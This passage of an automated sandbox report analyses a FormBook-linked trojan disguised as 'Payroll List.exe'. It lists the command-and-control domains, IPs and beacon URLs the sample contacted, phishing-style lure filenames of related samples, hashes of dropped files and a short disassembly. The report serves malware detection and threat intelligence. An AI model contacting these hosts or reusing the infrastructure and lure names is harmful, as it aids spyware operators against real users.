                http://www.servannto.site/h26k/?1fo=GF14svyhH44dt&NjHpTfh=3BjO5l4trS+mOtJOU23IMPLHJrJKWDXXfOCWIFV4tkiUomDH7G5wxffcY7A/EhE+G/r5frF5I7R9nf11AZCcJ5+lxyBJff7SJaPEJKSXzAPLDFQjr1SUqUGQs1Ux+2nJpQ==0%Avira URL Cloudsafe
                http://www.telforce.one0%Avira URL Cloudsafe
                http://www.mcfunding.org/0598/?1fo=GF14svyhH44dt&NjHpTfh=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dMSPmSyMXvFwuhBmNF6SR00f5xEMx0RhVmciiGarBUFx9Q==0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                mcfunding.org
                		3.33.130.190
                		truetrue
                  		unknown
                  d63dm.top
                  		154.23.184.218
                  		truetrue
                    		unknown
                    www.huiguang.xyz
                    		154.216.76.80
                    		truefalse
                      		high
                      www.servannto.site
                      		31.31.196.17
                      		truetrue
                        		unknown
                        www.klohk.tech
                        		103.224.182.242
                        		truefalse
                          		high
                          www.telforce.one
                          		64.190.63.222
                          		truetrue
                            		unknown
                            beingandbecoming.ltd
                            		3.33.130.190
                            		truetrue
                              		unknown
                              migorengya8.click
                              		198.252.98.54
                              		truetrue
                                		unknown
                                www.futurevision.life
                                		203.161.49.193
                                		truefalse
                                  		high
                                  schedulemassage.xyz
                                  		3.33.130.190
                                  		truetrue
                                    		unknown
                                    www.beingandbecoming.ltd
                                    		unknown
                                    		unknownfalse
                                      		unknown
                                      www.migorengya8.click
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.mcfunding.org
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.d63dm.top
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.schedulemassage.xyz
                                            		unknown
                                            		unknowntrue
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.migorengya8.click/y3dc/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.futurevision.life/hxmz/?NjHpTfh=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70ewIeMOmwh+ftSU1XmKvTSoNxNN/QLOdtg9qtYWOUm1ByQ==&1fo=GF14svyhH44dttrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.servannto.site/h26k/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.migorengya8.click/y3dc/?NjHpTfh=ihLGZn7rk3oJmiI0qHBJyF4us9aj83dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tRERiLp2a4b9y8ndNk9xgL1b55xNz3Mr8JVSoFw+CxXG/tVnA==&1fo=GF14svyhH44dttrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.futurevision.life/hxmz/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.klohk.tech/3m3e/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.huiguang.xyz/hv6g/?NjHpTfh=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGP8KkEC54eipAN6+u9bqO0oPPtGBbKuyofNdvdufJOx9cYQ==&1fo=GF14svyhH44dttrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.telforce.one/ykhz/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.servannto.site/h26k/?1fo=GF14svyhH44dt&NjHpTfh=3BjO5l4trS+mOtJOU23IMPLHJrJKWDXXfOCWIFV4tkiUomDH7G5wxffcY7A/EhE+G/r5frF5I7R9nf11AZCcJ5+lxyBJff7SJaPEJKSXzAPLDFQjr1SUqUGQs1Ux+2nJpQ==true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.beingandbecoming.ltd/79tr/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.beingandbecoming.ltd/79tr/?NjHpTfh=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8CAmIyANUKvAf3+5N6bOzfwLz/Gtq1ZNC0AtH/TFhPdx4Q==&1fo=GF14svyhH44dttrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mcfunding.org/0598/?1fo=GF14svyhH44dt&NjHpTfh=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dMSPmSyMXvFwuhBmNF6SR00f5xEMx0RhVmciiGarBUFx9Q==true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.d63dm.top/rqnz/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mcfunding.org/0598/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.d63dm.top/rqnz/?NjHpTfh=76huNjt+Arc+fPcCbUr8ZcsQaHE6oyRuYOqfGZIequmDvyuWFmMJMF1Z7BKJ7tjr9vaKr64/B4AayP3kwCu5tZILeOOALNuMLpp3tbYRhrZPyWqW3RF19Jr1EDacfA/CTw==&1fo=GF14svyhH44dttrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.klohk.tech/3m3e/?NjHpTfh=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cNftXSlpvpmQYoxqRDgL404wqyKQKR0qu5cYpfr80+FdsRQ==&1fo=GF14svyhH44dttrue
                                              • Avira URL Cloud: safe
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/ac/?q=ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://34.92.79.175:19817ktmutil.exe, 00000006.00000002.3293451407.00000000037B4000.00000004.10000000.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3292809726.0000000003214000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2045258675.0000000025CB4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.klohk.tech/3m3e/?NjHpTfh=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRueLiCpwzRIeWAs.exe, 00000007.00000002.3292809726.0000000003B80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.ecosia.org/newtab/ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ac.ecosia.org/autocomplete?q=ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.telforce.oneeLiCpwzRIeWAs.exe, 00000007.00000002.3295460520.00000000052E3000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://hm.baidu.com/hm.js?cf95fa39f4a72ce6b85bbfbe9eadb95aktmutil.exe, 00000006.00000002.3293451407.00000000037B4000.00000004.10000000.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3292809726.0000000003214000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2045258675.0000000025CB4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  203.161.49.193
                                                                  		www.futurevision.lifeMalaysia
                                                                  		45899VNPT-AS-VNVNPTCorpVNfalse
                                                                  31.31.196.17
                                                                  		www.servannto.siteRussian Federation
                                                                  		197695AS-REGRUtrue
                                                                  103.224.182.242
                                                                  		www.klohk.techAustralia
                                                                  		133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                                  198.252.98.54
                                                                  		migorengya8.clickCanada
                                                                  		20068HAWKHOSTCAtrue
                                                                  64.190.63.222
                                                                  		www.telforce.oneUnited States
                                                                  		11696NBS11696UStrue
                                                                  154.216.76.80
                                                                  		www.huiguang.xyzSeychelles
                                                                  		132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                                  154.23.184.218
                                                                  		d63dm.topUnited States
                                                                  		174COGENT-174UStrue
                                                                  3.33.130.190
                                                                  		mcfunding.orgUnited States
                                                                  		8987AMAZONEXPANSIONGBtrue

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1560911
                                                                  Start date and time:2024-11-22 14:43:03 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 9m 40s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Run name:Run with higher sleep bypass
                                                                  Number of analysed new started processes analysed:11
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:2
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:Payroll List.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@9/3@11/8
                                                                  EGA Information:
                                                                  • Successful, ratio: 75%
                                                                  HCA Information:
                                                                  • Successful, ratio: 95%
                                                                  • Number of executed functions: 44
                                                                  • Number of non-executed functions: 300
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target eLiCpwzRIeWAs.exe, PID 5964 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • VT rate limit hit for: Payroll List.exe

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  No simulations

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  203.161.49.193MV KODCO.exeGet hashmaliciousFormBookBrowse
                                                                  • www.futurevision.life/hxmz/?jD=VzTtTZ&1H=xeYt+TVrluKccowmz5a5GltLZ9YZ3snijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70c0RaNOmwh+TnBkmQn+jSxAt6pokQYbXkws=
                                                                  PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                  • www.inspires.website/tv3i/
                                                                  Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                  • www.futurevision.life/hxmz/
                                                                  PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                  • www.futurevision.life/hxmz/
                                                                  Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                                  • www.futurevision.life/cadc/?mRu=yfxAwDfWka0dfjkEErxT6WYgWaOc4HN689PIo8avXNW9JAsEk9V7nvZjppH3ozqb+GZGdofwBlLzR01W2aLtY3/CfTpxh0qnHwCWqwdq33lIMBmS8NPwCm4=&UJ=7H1XM
                                                                  Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.eco-tops.website/n54u/
                                                                  Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                  • www.futurevision.life/hxmz/
                                                                  DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                  • www.harmonid.life/aq3t/
                                                                  DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                  • www.harmonid.life/aq3t/
                                                                  Statement Cargomind 2024-09-12 (K07234).exeGet hashmaliciousFormBookBrowse
                                                                  • www.fitlifa.xyz/6tsn/
                                                                  31.31.196.17PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                  • www.servannto.site/h26k/
                                                                  Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                  • www.servannto.site/h26k/
                                                                  wODub61gZe.exeGet hashmaliciousFormBookBrowse
                                                                  • www.dverkom.store/sflr/
                                                                  r6lOHDg9N9.exeGet hashmaliciousFormBookBrowse
                                                                  • www.dverkom.store/p6ze/
                                                                  URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousFormBookBrowse
                                                                  • www.dverkom.store/66j2/
                                                                  FW CMA SHZ Freight invoice CHN1080769.exeGet hashmaliciousFormBookBrowse
                                                                  • www.dverkom.store/66j2/
                                                                  Purchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                                                  • www.dverkom.store/fbcx/
                                                                  SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                  • www.servannto.site/h26k/
                                                                  3wgZ0nlbTe.exeGet hashmaliciousFormBookBrowse
                                                                  • www.dverkom.store/7hot/
                                                                  RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exeGet hashmaliciousFormBookBrowse
                                                                  • www.dverkom.store/7hot/

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  www.servannto.sitePROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                  • 31.31.196.17
                                                                  Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                  • 31.31.196.17
                                                                  SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                  • 31.31.196.17
                                                                  www.huiguang.xyzMV KODCO.exeGet hashmaliciousFormBookBrowse
                                                                  • 154.92.61.37
                                                                  Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                  • 154.92.61.37
                                                                  PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                  • 154.92.61.37
                                                                  rGO880-PDF.exeGet hashmaliciousFormBookBrowse
                                                                  • 154.92.61.37
                                                                  Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                  • 154.92.61.37
                                                                  SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                  • 154.92.61.37

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  TRELLIAN-AS-APTrellianPtyLimitedAUThermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                  • 103.224.182.242
                                                                  DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                  • 103.224.182.242
                                                                  SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                  • 103.224.182.242
                                                                  PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                  • 103.224.182.242
                                                                  Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                  • 103.224.182.242
                                                                  8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                  • 103.224.182.252
                                                                  7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                  • 103.224.182.252
                                                                  UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                  • 103.224.182.252
                                                                  1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                  • 103.224.182.252
                                                                  arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                                                                  • 103.224.182.252
                                                                  AS-REGRUHXpVpoC9cr.exeGet hashmaliciousFormBookBrowse
                                                                  • 31.31.198.145
                                                                  Delivery_Notification_00000207899.doc.jsGet hashmaliciousUnknownBrowse
                                                                  • 194.58.112.173
                                                                  F8TXbAdG3G.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                  • 195.133.18.88
                                                                  PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                  • 31.31.196.17
                                                                  Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                  • 194.58.112.174
                                                                  PO AT-5228.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.58.112.174
                                                                  shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.58.112.174
                                                                  file_1443.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  • 194.58.42.154
                                                                  lsass.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  • 194.58.42.154
                                                                  yakuza.i686.elfGet hashmaliciousUnknownBrowse
                                                                  • 212.24.36.97
                                                                  VNPT-AS-VNVNPTCorpVNarm7.nn-20241122-0008.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  • 123.23.95.241
                                                                  Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                  • 203.161.42.73
                                                                  ppc.elfGet hashmaliciousMiraiBrowse
                                                                  • 14.245.235.111
                                                                  x86_64.elfGet hashmaliciousMiraiBrowse
                                                                  • 123.25.106.125
                                                                  i486.elfGet hashmaliciousMiraiBrowse
                                                                  • 113.175.131.151
                                                                  DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                  • 203.161.43.228
                                                                  A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                  • 202.92.5.23
                                                                  SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                  • 203.161.46.205
                                                                  need quotations.exeGet hashmaliciousFormBookBrowse
                                                                  • 203.161.42.73
                                                                  exe009.exeGet hashmaliciousEmotetBrowse
                                                                  • 113.161.148.81

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Temp\283026M3L

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\ktmutil.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                  Category:dropped
                                                                  Size (bytes):196608
                                                                  Entropy (8bit):1.1209886597424439
                                                                  Encrypted:false
                                                                  SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                  MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                  SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                  SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                  SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\aut8438.tmp

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Payroll List.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):288256
                                                                  Entropy (8bit):7.99290766412211
                                                                  Encrypted:true
                                                                  SSDEEP:6144:mnetfYEEZlwShUhJo7TdmDzreAtPYvwT6WlyHfg2pizQjEvP:Qetb0hOJo7TdwDiwTHlyI2I0jEH
                                                                  MD5:7B6C3967EE26BAC291D585DAE2BCB6FD
                                                                  SHA1:7153F3FB7FEE5960A632AB6030A2CE37D4843A39
                                                                  SHA-256:809BCF736D090990DC4A3A1D9FBFE97B5E2BFB9FEEF5E7F46A8AFD6DC6201AC8
                                                                  SHA-512:339A7D09517CF270F9E9500F0E39CA1DB6385AE19C7E14A152B6F93D7EDC755AD5DBA97A76A5F75516DAFF7A6A220DB25B25212B7397C4DD16AE2FB2F9B37F12
                                                                  Malicious:false
                                                                  Preview:..q..1JNF..[...v.JM..mQI...J1JNFODERAV4EJ1JNFODERAV4EJ1JN.ODE\^.:E.8.o.N..s.>]6jA8!!=%(r"7Z+%Ej,#o60<a?Ze.~.n+ |L[>aJ1JNFOD<SH..%-.w.!.y%5.L...*).U..}6S.P..z/#..(5\x*V.NFODERAVd.J1.OGO}. V4EJ1JNF.DGSJW?EJeNNFODERAV4.^1JNVODE"EV4E.1J^FODGRAP4EJ1JNFIDERAV4EJANNFMDERAV4GJq.NF_DEBAV4EZ1J^FODERAF4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4k>T2:FOD..EV4UJ1J.BODURAV4EJ1JNFODERaV4%J1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODE

                                                                  C:\Users\user\AppData\Local\Temp\inhumation

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Payroll List.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):288256
                                                                  Entropy (8bit):7.99290766412211
                                                                  Encrypted:true
                                                                  SSDEEP:6144:mnetfYEEZlwShUhJo7TdmDzreAtPYvwT6WlyHfg2pizQjEvP:Qetb0hOJo7TdwDiwTHlyI2I0jEH
                                                                  MD5:7B6C3967EE26BAC291D585DAE2BCB6FD
                                                                  SHA1:7153F3FB7FEE5960A632AB6030A2CE37D4843A39
                                                                  SHA-256:809BCF736D090990DC4A3A1D9FBFE97B5E2BFB9FEEF5E7F46A8AFD6DC6201AC8
                                                                  SHA-512:339A7D09517CF270F9E9500F0E39CA1DB6385AE19C7E14A152B6F93D7EDC755AD5DBA97A76A5F75516DAFF7A6A220DB25B25212B7397C4DD16AE2FB2F9B37F12
                                                                  Malicious:false
                                                                  Preview:..q..1JNF..[...v.JM..mQI...J1JNFODERAV4EJ1JNFODERAV4EJ1JN.ODE\^.:E.8.o.N..s.>]6jA8!!=%(r"7Z+%Ej,#o60<a?Ze.~.n+ |L[>aJ1JNFOD<SH..%-.w.!.y%5.L...*).U..}6S.P..z/#..(5\x*V.NFODERAVd.J1.OGO}. V4EJ1JNF.DGSJW?EJeNNFODERAV4.^1JNVODE"EV4E.1J^FODGRAP4EJ1JNFIDERAV4EJANNFMDERAV4GJq.NF_DEBAV4EZ1J^FODERAF4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4k>T2:FOD..EV4UJ1J.BODURAV4EJ1JNFODERaV4%J1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODE

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.147743818613458
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:Payroll List.exe
                                                                  File size:1'212'928 bytes
                                                                  MD5:f15d8b7a5271a52273a158ff2f642d12
                                                                  SHA1:9a6178bbf1f646d6d29d6b9cfb7cfdd415f6458a
                                                                  SHA256:9de22b2b1f7bf1727126b7d85573f62bc9c247075936ced5cf1035bc893d48d7
                                                                  SHA512:ab0e27dca67fbe8f896fa4b38d42914d613aa31a94ccc7dfadc099605506cb7fd43e7dd4be55b07fafc05fc1d7e463aa151025250be917431bd9e0c121b9e7d7
                                                                  SSDEEP:24576:Ctb20pkaCqT5TBWgNQ7aT9xXW4wiZM/T6A:PVg5tQ7aT9Vwjb5
                                                                  TLSH:7145C01373DE8361C3725273BA66B701AEBB7C2506A1F56B2FD8093DB920121525EB73
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                                  File Icon

                                                                  Icon Hash:aaf3e3e3938382a0

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x425f74
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x673FBF94 [Thu Nov 21 23:17:40 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:1
                                                                  File Version Major:5
                                                                  File Version Minor:1
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:1
                                                                  Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  call 00007F072D2CD8EFh
                                                                  jmp 00007F072D2C0904h
                                                                  int3
                                                                  int3
                                                                  push edi
                                                                  push esi
                                                                  mov esi, dword ptr [esp+10h]
                                                                  mov ecx, dword ptr [esp+14h]
                                                                  mov edi, dword ptr [esp+0Ch]
                                                                  mov eax, ecx
                                                                  mov edx, ecx
                                                                  add eax, esi
                                                                  cmp edi, esi
                                                                  jbe 00007F072D2C0A8Ah
                                                                  cmp edi, eax
                                                                  jc 00007F072D2C0DEEh
                                                                  bt dword ptr [004C0158h], 01h
                                                                  jnc 00007F072D2C0A89h
                                                                  rep movsb
